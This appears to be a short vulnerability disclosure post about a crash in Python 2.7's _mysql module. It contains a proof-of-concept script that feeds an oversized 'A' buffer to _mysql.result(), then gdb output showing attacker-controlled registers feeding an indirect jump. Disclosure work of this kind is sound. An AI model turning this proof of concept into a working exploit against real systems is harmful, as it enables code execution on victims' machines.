Hello.
I found a vulnerability in _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
RDX=0x66666666
payload="A"*2048
_mysql.result(payload,RDX)
It's exploitable bug, I'm working on exploit.
(gdb) run mysql.py
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax 0x4141414141414141 4702111234474983745
rbx 0x7ffff7e91b90 140737352637328
rcx 0x0 0
rdx 0x66666666 1717986918
rsi 0x7ffff7eb1ec0 140737352769216
rdi 0x5555557f9890 93824995006608
rbp 0x7fffffffe120 0x7fffffffe120
rsp 0x7fffffffe0a8 0x7fffffffe0a8
r8 0x7fffffffdd00 140737488346368
r9 0x7fffffffdd80 140737488346496
r10 0x5555557824f0 93824994518256
r11 0x2 2
r12 0x5555557560a0 93824994336928
r13 0x0 0
r14 0x7ffff7e939c7 140737352645063
r15 0x7ffff7e91b90 140737352637328
rip 0x7ffff38e7f3c 0x7ffff38e7f3c <mysql_use_result+12>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
0x00007ffff38e7f30 <+0>: push %rbp
0x00007ffff38e7f31 <+1>: mov 0x4d0(%rdi),%rax
0x00007ffff38e7f38 <+8>: mov %rsp,%rbp
0x00007ffff38e7f3b <+11>: pop %rbp
=> 0x00007ffff38e7f3c <+12>: mov 0x18(%rax),%rax
0x00007ffff38e7f40 <+16>: jmpq *%rax
End of assembler dump.
(gdb)
|